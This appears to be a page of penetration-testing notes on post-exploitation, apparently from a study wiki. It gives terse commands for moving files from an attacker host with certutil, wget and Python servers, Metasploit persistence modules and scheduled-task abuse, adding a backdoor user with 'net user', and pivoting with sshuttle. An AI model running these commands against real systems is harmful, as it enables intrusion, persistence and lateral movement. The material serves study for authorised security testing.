Post Exploitation

File Transfers

  • Certutil

    • certutil.exe -urlcache -f http://IP_ADDRESS/FILE FILE

  • HTTP

    • python -m http.server 80

  • Browser

    • Navigate directly to file

  • FTP

    • python -m pyftpdlib 21 (ATTACKER_IP)

  • Linux

    • wget

  • Metasploit

    • Upload / Download feature

Maintaining Access

  • Persistence Scripts

    • run persistence -h

    • exploit/windows/local/persistence

    • exploit/windows/local/registry_persistence

  • Scheduled Tasks

    • run scheduleme

    • run schtaskabuse

  • Add a user

    • net user USERNAME PASSWORD /add

Pivoting

  • sshuttle can be used to pivot

    • sshuttle -r USER@IP_ADDRESS_1 IP_ADDRESS_2 --ssh-cmd "ssh -i IDENTITY_FILE"

  • Chisel is another tool option for this

PreviousGolden Ticket AttacksNextToolkit

Last updated